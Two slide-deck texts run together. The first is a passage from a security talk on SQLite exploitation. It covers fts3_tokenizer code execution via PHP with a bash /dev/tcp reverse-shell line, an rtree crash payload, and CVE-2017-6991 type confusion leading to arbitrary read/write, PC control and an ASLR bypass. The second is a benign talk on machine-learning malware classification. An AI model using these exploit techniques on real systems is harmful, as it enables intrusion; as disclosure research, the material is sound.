libphp and libsqlite3 as separated shared library, with version information it’s possible to recover the library maps from the leaked simple_tokenizer with (silly) hardcoded offsets 26 … 7fadb00fb000-7fadb01bc000 r-xp 00000000 08:01 569 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6 7fadb01bc000-7fadb03bb000 ---p 000c1000 08:01 569 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6 7fadb03bb000-7fadb03be000 r--p 000c0000 08:01 569 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6 7fadb03be000-7fadb03c0000 rw-p 000c3000 08:01 569 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6 … 7fadb6136000-7fadb6a34000 r-xp 00000000 08:01 173493 /usr/lib/apache2/modules/libphp5.so 7fadb6a34000-7fadb6c33000 ---p 008fe000 08:01 173493 /usr/lib/apache2/modules/libphp5.so 7fadb6c33000-7fadb6cde000 r--p 008fd000 08:01 173493 /usr/lib/apache2/modules/libphp5.so 7fadb6cde000-7fadb6ceb000 rw-p 009a8000 08:01 173493 /usr/lib/apache2/modules/libphp5.so ● There’s no perfect stack pivot gadget xCreate callback, but xOpen callback takes an argument from insert clause $db->exec("select fts3_tokenizer('simple', x'$spray_address'); create virtual table a using fts3; insert into a values('bash -c \"bash>/dev/tcp/127.1/1337 0<&1\"')"); ● To spray the struct, we can open the path :memory: and insert packed blob values into the in-memory table ● Some php runtime configuration can be set per directory using .htaccess, even when ini_set has been disabled. Some of these values are placed in continuous memory in .bss segment, like mysqlnd.net_cmd_buffer_size and mysqlnd.log_mask. We can use them to fake the structure. fts3_tokenizer code execution in PHP 27 fts3_tokenizer code execution in PHP ● Finally use the one-gadget in php to pop the shell .text:00000000002F137A mov rbx, rsi .text:00000000002F137D lea rsi, aRbLR+5 ; modes .text:00000000002F1384 sub rsp, 58h .text:00000000002F1388 mov [rsp+88h+var_74], edi .text:00000000002F138C mov rdi, rbx ; command .text:00000000002F138F mov [rsp+88h+var_58], rdx .text:00000000002F1394 mov rax, fs:28h .text:00000000002F139D mov [rsp+88h+var_40], rax .text:00000000002F13A2 xor eax, eax .text:00000000002F13A4 mov [rsp+88h+var_50], rcx .text:00000000002F13A9 mov [rsp+88h+var_48], 0 .text:00000000002F13B2 call _popen ● Too much hard coding, combined with other bugs will be much more reliable 28 Android has disabled fts3_tokenizer 29 Even SQLite itself 30 SQLite 3.11 has disabled the function by default WebKit has overridden the function now 31 Bonus The WebKit patch reveals more interesting functions /* ** The scalar function takes two arguments: (1) the number of dimensions ** to the rtree (between 1 and 5, inclusive) and (2) a blob of data containing ** an r-tree node. For a two-dimensional r-tree structure called "rt", to ** deserialize all nodes, a statement like: ** SELECT rtreenode(2, data) FROM rt_node; */ static void rtreenode(sqlite3_context *ctx, int nArg, sqlite3_value **apArg){ RtreeNode node; Rtree tree; tree.nDim = (u8)sqlite3_value_int(apArg[0]); tree.nDim2 = tree.nDim*2; tree.nBytesPerCell = 8 + 8 * tree.nDim; node.zData = (u8 *)sqlite3_value_blob(apArg[1]); 32 0day?! rtree extension has more fun. Unluckily, it’s not accessible from browsers. static int deserializeGeometry(sqlite3_value *pValue, RtreeConstraint *pCons){ ... memcpy(pBlob, sqlite3_value_blob(pValue), nBlob); ... if( pBlob->magic!=RTREE_GEOMETRY_MAGIC || nBlob!=nExpected ){ sqlite3_free(pInfo); return SQLITE_ERROR; } ... if( pBlob->cb.xGeom ){ pCons->u.xGeom = pBlob->cb.xGeom; 33 /* ** Value for the first field of every RtreeMatchArg object. The MATCH ** operator tests that the first field of a blob operand matches this ** value to avoid operating on invalid blobs (which could cause a segfault). */ #define RTREE_GEOMETRY_MAGIC 0x891245AB struct RtreeGeomCallback { int (*xGeom)(sqlite3_rtree_geometry*, int, RtreeDValue*, int*); ... }; PC control in 3 lines Process 37471 launched: '/usr/bin/sqlite3' (x86_64h) SQLite version 3.16.0 2016-11-04 19:09:39 sqlite> create virtual table x using rtree(a,b,c); sqlite> insert into x values(1,2,3); sqlite> select * from x where a match x’ab45128900000000414141414141414142424242424242424343434343434343444444444444444401000000000000004 54545454545454546464646464646464747474747474747’; Process 37471 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT) frame #0: 0x00007fffe0f740b4 libsqlite3.dylib`rtreeStepToLeaf + 1380 libsqlite3.dylib`rtreeStepToLeaf: -> 0x7fffe0f740b4 <+1380>: callq *0x8(%r8,%r9,8) 0x7fffe0f740b9 <+1385>: xorl %ecx, %ecx (lldb) x/xg $r8+$r9*8+8 0x100202258: 0x4141414141414141 (lldb) x/xg $rdi 0x100203590: 0x4444444444444444 34 We prefer exploitable bugs in browser! 35 Whitelist function optimize /* ** Implementation of the special optimize() function for FTS3. This ** function merges all segments in the database to a single segment. ** Example usage is: ** SELECT optimize(t) FROM t LIMIT 1; ** where 't' is the name of an FTS3 table. */ static void fts3OptimizeFunc( sqlite3_context *pContext, /* SQLite function call context */ int nVal, /* Size of argument array */ sqlite3_value **apVal /* Array of arguments */ ){ int rc; /* Return code */ Fts3Table *p; /* Virtual table handle */ Fts3Cursor *pCursor; /* Cursor handle passed through apVal[0] */ if( fts3FunctionArg(pContext, "optimize", apVal[0], &pCursor) ) return; p = (Fts3Table *)pCursor->base.pVtab; ... } 36 Type Confusion static int fts3FunctionArg( sqlite3_context *pContext, /* SQL function call context */ const char *zFunc, /* Function name */ sqlite3_value *pVal, /* argv[0] passed to function */ Fts3Cursor **ppCsr /* OUT: Store cursor handle here */ ){ Fts3Cursor *pRet; if( sqlite3_value_type(pVal)!=SQLITE_BLOB || sqlite3_value_bytes(pVal)!=sizeof(Fts3Cursor *) ){ char *zErr = sqlite3_mprintf("illegal first argument to %s", zFunc); sqlite3_result_error(pContext, zErr, -1); sqlite3_free(zErr); return SQLITE_ERROR; } memcpy(&pRet, sqlite3_value_blob(pVal), sizeof(Fts3Cursor *)); *ppCsr = pRet; return SQLITE_OK; } 37 FTS3 Tricks ● Virtual Table can have custom xColumn method in order to find the value of N-th column of current row. ○ int (*xColumn)(sqlite3_vtab_cursor*, sqlite3_context*, int N); ● FTS3 module accepts the table name as a column name. Some functions take the table name as the first argument. ○ SELECT optimize(t) FROM t LIMIT 1; ● However, when it’s not given with the correct column, it can still be compiled. ● The interpreter can never know the required type of column data. 38 Type Confusion SQLite version 3.14.0 2016-07-26 15:17:14 Enter ".help" for usage hints. Connected to a transient in-memory database. Use ".open FILENAME" to reopen on a persistent database. sqlite> create virtual table a using fts3(b); sqlite> insert into a values(x'4141414142424242'); sqlite> select hex(a) from a; C854D98F08560000 sqlite> select optimize(b) from a; [1] 37515 segmentation fault sqlite3 39 What do we control? static void fts3OptimizeFunc( sqlite3_context *pContext, int nVal, sqlite3_value **apVal ){ int rc; Fts3Table *p; Fts3Cursor *pCursor; UNUSED_PARAMETER(nVal); assert( nVal==1 ); if( fts3FunctionArg(pContext, "optimize", apVal[0], &pCursor) ) return; p = (Fts3Table *)pCursor->base.pVtab; rc = sqlite3Fts3Optimize(p); ... } 40 Let's take optimize() function as an example: ● With type confusion bug, we can specify arbitrary value for pCursor; ● If we can control memory in known address, we can construct Fts3Cursor struct, and other struct like Fts3Table; ● sqlite3Fts3Optimize will handle the fake instance; ● Do some code review to see if we can have memory RW or PC control. Exploitation Strategy 1. To have memory control in known address, heap spray is still available in modern browsers, e.g. by allocating a lot of JavaScript ArrayBuffer objects 2. Dereference Fts3Cursor at a specified and controlled location, where we can fake Fts3Cursor and other structs 3. Find a code path of optimize/offsets/matchinfo() for arbitrary RW primitive/PC control 41 One Exploitation Path for Arbitrary RW 42 fts3OptimizeFunc sqlite3Fts3Optimize sqlite3Fts3SegmentsClose sqlite3_blob_close sqlite3_finalize sqlite3VdbeFinalize sqlite3VdbeReset sqlite3ValueSetStr sqlite3VdbeMemSetStr This function is basically just doing "strcpy" with controlled arguments, by which we can achieve the following: Copy value from controlled location to any addr => Arbitrary write Copy value from any addr to controlled location => Arbitrary read sqlite3VdbeTransferError Let's start a long journey... static void fts3OptimizeFunc( sqlite3_context *pContext, int nVal, sqlite3_value **apVal ){ int rc; Fts3Table *p; Fts3Cursor *pCursor; UNUSED_PARAMETER(nVal); assert( nVal==1 ); if( fts3FunctionArg(pContext, "optimize", apVal[0], &pCursor) ) return; p = (Fts3Table *)pCursor->base.pVtab; rc = sqlite3Fts3Optimize(p); ... } 43 Fake a Fts3Cursor struct and all related structs in controlled (heap sprayed) memory. Added a Fts3Table to Fts3Cursor. Fts3Table ... Fts3Cursor pVtab ... ... sqlite3_vtab_c ursor sqlite3Fts3Optimize int sqlite3Fts3Optimize(Fts3Table *p){ int rc; rc = sqlite3_exec(p->db, "SAVEPOINT fts3", 0, 0, 0); if( rc==SQLITE_OK ){ rc = fts3DoOptimize(p, 1); if( rc==SQLITE_OK || rc==SQLITE_DONE ){ int rc2 = sqlite3_exec(p->db, "RELEASE fts3", 0, 0, 0); if( rc2!=SQLITE_OK ) rc = rc2; }else{ sqlite3_exec(p->db, "ROLLBACK TO fts3", 0, 0, 0); sqlite3_exec(p->db, "RELEASE fts3", 0, 0, 0); } } sqlite3Fts3SegmentsClose(p); return rc; } 44 let sqlite3_exec() != SQLITE_OK Fts3Cursor sqlite3_vtab_c ursor pVtab ... ... Fts3Table ... let sqlite3_exec() != SQLITE_OK int sqlite3_exec( sqlite3 *db, const char *zSql, sqlite3_callback xCallback, void *pArg, char **pzErrMsg ){ int rc = SQLITE_OK; const char *zLeftover; sqlite3_stmt *pStmt = 0; char **azCols = 0; int callbackIsInit; if( !sqlite3SafetyCheckOk(db) ) return SQLITE_MISUSE_BKPT; if( zSql==0 ) zSql = ""; ... } int sqlite3SafetyCheckOk(sqlite3 *db){ u32 magic; if( db==0 ){ logBadConnection("NULL"); return 0; } magic = db->magic; if( magic!=SQLITE_MAGIC_OPEN ){ if( sqlite3SafetyCheckSickOrOk(db) ){ testcase( sqlite3GlobalConfig.xLog!=0 ); logBadConnection("unopened"); } return 0; }else{ return 1; } } 45 let sqlite3SafetyCheckOk() = 0 let db = 0 let p->db = 0 Fts3Cursor sqlite3_vtab_c ursor pVtab ... ... Fts3Table ... db = 0 ... Fts3Cursor sqlite3_vtab_c ursor pVtab ... ... Fts3Table ... sqlite3Fts3SegmentsClose void sqlite3Fts3SegmentsClose(Fts3Table *p){ sqlite3_blob_close(p->pSegments); p->pSegments = 0; } int sqlite3_blob_close(sqlite3_blob *pBlob){ Incrblob *p = (Incrblob *)pBlob; int rc; sqlite3 *db; if( p ){ db = p->db; sqlite3_mutex_enter(db->mutex); rc = sqlite3_finalize(p->pStmt); sqlite3DbFree(db, p); sqlite3_mutex_leave(db->mutex); }else{ rc = SQLITE_OK; } return rc; } 47 Fts3Cursor sqlite3_vtab_c ursor pVtab ... ... Incrblob ... pStmt db ... Vdbe ... sqlite3 ... mutex = 0 ... Fts3Table ... db = 0 ... pSegments ... ● Added a Incrblob to Fts3Table. ● Added a sqlite3(db) and a Vdbe to the Incrblob. sqlite3_finalize int sqlite3_finalize(sqlite3_stmt *pStmt){ int rc; if( pStmt==0 ){ rc = SQLITE_OK; }else{ Vdbe *v = (Vdbe*)pStmt; sqlite3 *db = v->db; if( vdbeSafety(v) ) return SQLITE_MISUSE_BKPT; sqlite3_mutex_enter(db->mutex); checkProfileCallback(db, v); rc = sqlite3VdbeFinalize(v); rc = sqlite3ApiExit(db, rc); sqlite3LeaveMutexAndCloseZombie(db); } return rc; } int sqlite3VdbeFinalize(Vdbe *p){ int rc = SQLITE_OK; if( p->magic==VDBE_MAGIC_RUN || p->magic==VDBE_MAGIC_HALT ){ rc = sqlite3VdbeReset(p); assert( (rc & p->db->errMask)==rc ); } sqlite3VdbeDelete(p); return rc; } 48 let p->magic == VDBE_MAGIC_HALT survive vdbeSafety()/checkProfileCallback() Structs 49 Fts3Cursor sqlite3_vtab_c ursor pVtab ... ... Incrblob ... pStmt db ... Fts3Table ... db = 0 ... pSegments ... sqlite3 ... mutex = 0 ... Vdbe db ... magic = VDBE_MAGIC_HALT ... sqlite3VdbeReset int sqlite3VdbeReset(Vdbe *p){ sqlite3 *db; db = p->db; sqlite3VdbeHalt(p); if( p->pc>=0 ){ vdbeInvokeSqllog(p); sqlite3VdbeTransferError(p); sqlite3DbFree(db, p->zErrMsg); p->zErrMsg = 0; if( p->runOnlyOnce ) p->expired = 1; }else if( p->rc && p->expired ){ ... } Cleanup(p); p->iCurrentTime = 0; p->magic = VDBE_MAGIC_RESET; return p->rc & db->errMask; } 50 survive sqlite3VdbeHalt() p->pc >= 0 Structs Fts3Cursor sqlite3_vtab_c ursor pVtab ... ... Incrblob ... pStmt db ... Fts3Table ... db = 0 ... pSegments ... sqlite3 ... mutex = 0 ... Vdbe db ... magic = VDBE_MAGIC_HALT ... pc >= 0 ... sqlite3VdbeTransferError int sqlite3VdbeTransferError(Vdbe *p){ sqlite3 *db = p->db; int rc = p->rc; if( p->zErrMsg ){ db->bBenignMalloc++; sqlite3BeginBenignMalloc(); if( db->pErr==0 ) db->pErr = sqlite3ValueNew(db); sqlite3ValueSetStr(db->pErr, -1, p->zErrMsg, SQLITE_UTF8, SQLITE_TRANSIENT); sqlite3EndBenignMalloc(); db->bBenignMalloc--; db->errCode = rc; }else{ sqlite3Error(db, rc); } return rc; } void sqlite3ValueSetStr(sqlite3_value *v, int n, const void *z, u8 enc, void (*xDel)(void*) ){ if( v ) sqlite3VdbeMemSetStr((Mem *)v, z, n, enc, xDel); } 52 fake a db->pErr struct, and p->zErrMsg != 0 sqlite3VdbeMemSetStr int sqlite3VdbeMemSetStr(Mem *pMem, const char *z, int n, u8 enc, void (*xDel)(void*) ){ int nByte = n; ... if( nByte<0 ){ if( enc==SQLITE_UTF8 ){ nByte = sqlite3Strlen30(z); if( nByte>iLimit ) nByte = iLimit+1; } ... } if( xDel==SQLITE_TRANSIENT ){ int nAlloc = nByte; ... if( sqlite3VdbeMemClearAndResize(pMem, MAX(nAlloc,32)) ) return SQLITE_NOMEM_BKPT; memcpy(pMem->z, z, nAlloc); } ... return SQLITE_OK; } 53 sqlite3VdbeMemClearAndResize() will do: pMem->z = pMem->zMalloc; For memcpy(): z is a string pointer from Vdbe's zErrMsg pMem is a Mem struct, pMem->z also can be controlled by pMem->zMalloc. nAlloc is the length of string z. So we have a "strcpy" primitive with controlled arguments: source and destination. Structs 54 Fts3Cursor sqlite3_vtab_c ursor pVtab ... ... Incrblob ... pStmt db ... Fts3Table ... db = 0 ... pSegments ... sqlite3 ... mutex = 0 ... Vdbe db ... magic = VDBE_MAGIC_HALT ... pc >= 0 ... zErrMsg ... Mem/ sqlite3_value ... zMalloc ... pErr ... Added a Mem struct to the sqlite3 struct. For strcpy primitive: zMalloc specifies the source, zErrMsg specifies the destination. One Exploitation Path For PC Control 55 fts3OptimizeFunc sqlite3Fts3Optimize sqlite3Fts3SegmentsClose sqlite3_blob_close sqlite3_finalize checkProfileCallback invokeProfileCallback invokeProfileCallback() will invoke many callbacks: xProfile/xTrace/xCurrentTime/xCurrentTimeint64. These callbacks call be controlled in sprayed memory. invokeProfileCallback static SQLITE_NOINLINE void invokeProfileCallback(sqlite3 *db, Vdbe *p){ sqlite3_int64 iNow; sqlite3_int64 iElapse; ... sqlite3OsCurrentTimeInt64(db->pVfs, &iNow); iElapse = (iNow - p->startTime)*1000000; if( db->xProfile ){ db->xProfile(db->pProfileArg, p->zSql, iElapse); } if( db->mTrace & SQLITE_TRACE_PROFILE ){ db->xTrace(SQLITE_TRACE_PROFILE, db->pTraceArg, p, (void*)&iElapse); } p->startTime = 0; } 56 We used callback db->xProfile because we can also control 2 arguments through db->pProfileArg and p->zSql To survive sqlite3OsCurrentTimeInt64(), we should construct db->pVfs of struct sqlite3_vfs, and nullify the callback db->Vfs->xCurrentTimeInt64. Structs 57 Fts3Cursor sqlite3_vtab_c ursor pVtab ... ... Incrblob ... pStmt db ... Fts3Table ... db = 0 ... pSegments ... sqlite3 pVfs ... mutex = 0 pProfileArg xProfile ... Vdbe db ... magic = VDBE_MAGIC_HALT ... zSql ... We achieved arbitrary function call: xProfile specifies gadget address; pProfileArg specifies first argument; zSql specifies second argument ... xCurrentTimeInt64 ... sqlite3_vfs ASLR Bypass 58 sqlite> create virtual table a using fts3(b); sqlite> insert into a values(x'4141414142424242'); sqlite> select hex(a) from a; C854D98F08560000 ● By CVE-2017-6991 above, we leaked the address of a FTS3Cursor object ● The first member of struct FTS3Cursor points to a global variable fts3Module ● By arbitrary read primitive, we can read the address of fts3Module, which will reveal the address of sqlite library (at least, sometimes sqlite will be statically linked together with other libraries) Shellcode Execution ● With arbitrary function call primitive, invoke longjmp/mprotect gadget as below, to mark the memory pages of shellcode as executable ● Trigger the function call primitive again to jump to the shellcode 59 "Birds" 60 61 ● 62 ● 63 ● 64 ● Thank you! 65
pdf
Machine Learning Protect against tomorrow’s threats 基於機器學習的惡 意軟體分類實作:" Microsoft"Malware" Classification" Challenge"經驗談 Trend Micro ch0upi miaoski Kyle Chung 2 Dec 2016 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats ch0upi • Staff"engineer"in"Trend"Micro • Machine"Learning"+"Data"Analysis • Threat"intelligence"services • KDDCup 2014"+"KDDCup 2016:"Top10 • GoTrend:"6th in"UEC"Cup"2015 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats miaoski • Senior"threat"researcher"in"Trend"Micro • Threat"intelligence • Smart"City • SDR • Arduino"+"RPi makers • Loves"cats Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 4 Outline • Why"Malware"Classification? • Machine"Learning • Microsoft"Challenge • How"to"Solve"it? • Conclusion Machine Learning Protect against tomorrow’s threats MALWARE' CLASSIFICATION Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats What’s"Malware"Classification? • Identify"malware"family Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats Why"Malware"Classification? • Know"how"to"clean • Possible"attribution • Set"proper"priority Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats Current"Malware"Classification • Manually"generated"by"researchers • Use"signature"to"fingerprint"malware" • YARA"rules Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats Challenge • Manual"process"è wrong"family • more"and"more"malware"families • Very"large"volume • daily"1M+"samples • Increasing"signatures • Slow"in"scanning"+"need"more"storage Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats BSidesLV 2016:"VirusShare • John"Seymour,"Labeling"the"VirusShare Corpus:" Lessons"Learned,"BSidesLV 2016 • VirusShare Corpus:"~20M"files Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats Machine"Learning"for • Automation"of"malware"family"identification • Save"researcher’s"effort Machine Learning Protect against tomorrow’s threats MACHINE LEARNING Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 13 Machine"Learning"Steps • Prepare"Data • Generate"Feature • Train"Model • Make"Prediction • Evaluate Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 14 Fruit"Classification • Apple • Banana Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 15 Fruit"Features • Color • Shape • Size • Weight Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 16 Learning • Apple • Banana Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 17 Learned"Model"of"Fruit • Apple • Color:"Red • Shape:"Round • Banana • Color:"Yellow • Shape:"Long Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 18 New"Fruit"Coming… • Apple?"Banana? Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 19 Prediction"of"Fruits • Fruit"1 • Color:"Red"=>"Apple • Shape:"Round"=>"Apple • Fruit"2 • Color:"Yellow"=>"Banana • Shape:"Long"=>"Banana Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 20 Evaluation"of"Fruit • Accuracy:"(9+9)/20"="90% Apple Banana Apple 9 1 Banana 1 9 Total 10 10 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 21 Machine"Learning"Steps • Prepare"Data • Generate"Feature • Train"Model • Make"Prediction • Evaluate Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 22 Machine"Learning"is"... • Mathematical"methods"and"algorithms • From"historical"labelled"data • Find"a"separating"hyperplane • Apply"it"on"future"data Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 23 Feature"is"... • Measurable"property"of"a"phenomenon"being" observed • Use"to"describe"entries • Feature"vector • input"of"machine"learning"algorithm • Source"of"features • data"exploring • domain"knowledge Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 24 Model"is"... • A"mathematical"description"of"how"to"classify"the" data • Parameters"tuned"by"certain"algorithm • training • Used"to"make"prediction Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 25 Prediction • Identify"the"class"of"new"entities • With"trained"model"from"training"data Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 26 Evaluation • Review"model"result"by"some"measurements • Cross"validation • Evaluation"functions • Accuracy • logloss • AUC • precision,"recall,"F1 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 27 Glue"Language • Glue"the"steps"of"Machine"Learning"Learning • Batch"running"for"large"amount"of"data • Integration"with"Hadoop,"Spark • Rich"libraries/Algorithm"support • Easy"to"develop/learn Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 28 scikit learn • Open"source"machine"learning"library"for"python • Various"classification,"regression"and"clustering" algorithms • Interoperate"with"NumPy,"SciPy,"and"underlying" BLAS Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 29 scikit learn"cheat-sheet Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 30 Supported"Algorithm"in"scikit learn • Classification"Algorithm • Logistic"Regression:"linear_model.LogisticRegression() • SVM:"svm.SVC() • Random"Forest:"ensemble.RandomForestClassifier() • Interface • fit(X,"Y):"train"model • Yp=predict(X):"make"prediction Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 31 Evaluation"Functions"in"scikit learn • Evaluation"functions • metrics.accuracy_score() • metrics.log_loss() • metrics.auc() • metrics.f1_score() • metrics.confusion_matrix() • metrics.classification_report() Machine Learning Protect against tomorrow’s threats MICROSOFT'MALWARE' CLASSIFICATION'CHALLENGE Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 33 Microsoft"Malware"Classification" Challenge • Hosted"by"WWW"2015"/"BIG"2015" • Microsoft"Malware"Protection"Center Microsoft"Azure"Machine"Learning Microsoft"Talent"Management • PE"Hexdump &"Disassembled • Training:"10,868"(compressed:"17.5GB) • Testing:"10,873"(compressed:"17.7GB) Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 34 9 Classes Category Count 1 Ramnit 1541 2 Lollipop 2478 3 Kelihos_ver3 2942 4 Vundo 475 5 Simda 42 6 Tracur 751 7 Kelihos_ver1 398 8 Obfuscator.ACY 1228 9 Gatak 1013 Total 10868 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 35 Class:"Ramnit • Steal"sensitive"personal"information • Infected"through"removable"drivers • Copy"itself"using"a"hard-coded"name,"or"with"a" random"file"name"to"a"random"folder • Inject"codes"into"svchost.exe • Infects"DLL,"EXE,"HTML Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 36 Class:"Lollipop • An"adware"shows"ads"when"browsing"web • Bundle"with"third-party"software • Auto"run"when"Windows"starting Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 37 Class:"Kelihos • A"Trojan"family"distributes"spam"email"with" malware"download"link • Communicate"with"C&C"server • Some"variants"install"WinPcap to"spy"network" activity Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 38 PE"Hexdump w/o"Header Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 39 IDA"Pro"Dump Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 40 IDA"Pro"Dump Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 41 IDA"Pro"Dump Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 42 Evaluation"Function pij is the submitted probability of sample i is class j yij=1 if sample i is class j, yij=0 for others 𝑙𝑜𝑔𝑙𝑜𝑠𝑠 = − 1 𝑁 ) ) 𝑦𝑖𝑗-log-(𝑝𝑖𝑗) 4 567 8 967 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 43 Evaluation"Example • Submission 00000000,0.5,0.5,0,0,0,0,0,0,0,0 00000001,0,0,0.5,0.5,0,0,0,0,0,0 00000002,0,0,1,0,0,0,0,0,0,0 • logloss ="- (log(0.5)+log(0)+log(1))/3 • log(0)"=>"log(1e-15) Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 44 Leader"Board • Public"vs."Private Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 45 Leader"Board Public Private Machine Learning Protect against tomorrow’s threats HOW'TO'SOLVE'IT? Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 47 First"Feature"Set • Binary"size • Hex"count • String"length"stats • TLSH Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 48 Binary"Size Category Avg. Size 1 Ramnit 1482170 2 Lollipop 5829530 3 Kelihos_ver3 8982630 4 Vundo 1120950 5 Simda 4552330 6 Tracur 1801150 7 Kelihos_ver1 5051900 8 Obfuscator.ACY 827118 9 Gatak 2555070 0 1000000 2000000 3000000 4000000 5000000 6000000 7000000 8000000 9000000 10000000 1 2 3 4 5 6 7 8 9 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 49 Hex"Count • Count"of"HEX • 00,"01,"02,…,"FE,"FF,"?? • 257"dimensions • 1-gram Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 50 Hex"Count"Distribution 0009121b242d36 3f 48515a636c757e879099a2abb4bdc6 cf d8e1ea f3 fc 0009121b242d36 3f 48515a636c757e879099a2abb4bdc6 cf d8e1ea f3 fc 0009121b242d36 3f 48515a636c757e879099a2abb4bdc6 cf d8e1ea f3 fc 1. Ramnit 2. Lollipop 3. Kelihos_v3 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 51 Hex"Count"Confusion"Matrix? Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 52 String"Stats • String:"printable"chars"where"length">"4 • String"count,"avg."length,"max"length 0 2000 4000 6000 8000 10000 12000 14000 1 2 3 4 5 6 7 8 9 0 2 4 6 8 10 12 14 16 18 20 1 2 3 4 5 6 7 8 9 Avg. Count Avg. length Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 53 TLSH • Trend"Micro"Locality"Sensitive"Hash • Fuzzy"matching"for"similarity"comparison • Get"the"most"similar"class"by"voting"of"Top5"similar" files"from"training"data Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 54 TLSH 0 500 1000 1500 2000 2500 3000 3500 1 2 3 4 5 6 7 8 9 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 55 More"Features • HEX"n-gram • API"call • Import"table • Instruction • Domain"knowledge Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 56 2-gram/3-gram • 2-gram:"(256+1)^2="66,049 • 3-gram:"(256+1)^3="16,974,593 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 57 HEX"2-gram/3-gram • Important"2-gram"Example • Feature"selection:"reduce"feature"size BiHEX 1. Ramnit 2. Lollipop 3. Kelihos_ver3 97 86 1.412 2.047 26.651 4b e5 1.718 0.722 13.201 f7 99 1.746 12.539 13.606 75 08 228.09 288.78 13.168 4e 47 146.318 12.159 13.512 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 58 API"Call • API"used"in"PE API 1. Ramnit 2. Lollipop 3. Kelihos_ver3 IsWindow() 0.164 0.257 0.987 DispatchMessageA() 0.159 0.845 0.987 GetCommandLineA() 0.355 0.981 0.025 DllEntryPoint() 0.656 0 0 GetIconInfo() 0.023 0 0.936 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 59 Import"Table • A"lookup"table"for"calling"functions"in"other"module 1. Ramnit 2. Lollipop 3. Kelihos_ver3 KERNEL32.dll KERNEL32.dll USER32.dll USER32.dll USER32.dll KERNEL32.dll ADVAPI32.dll ADVAPI32.dll MSASN1.dll ole32.dll OPENGL32.dll UXTHEME.dll OLEAUT32.dll OLEAUT32.dll CLBCATQ.dll msvcrt.dll GDI32.dll DPNET.dll APPHELP.dll WS2_32.dll NTSHRUI.dll Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 60 Other"Info"in"Import"Table • Number"of"distinct"DLL 0 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 61 Instruction"Frequency • Very"powerful instruction 1. Ramnit 2. Lollipop 3. Kelihos_ver3 imul 86.768 2257.3 0.002 movzx 289.17 118.79 0 sbb 68.815 17.375 4.746 jnz 1154.8 154.57 7.842 mov 12336.6 7059.8 158.94 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 62 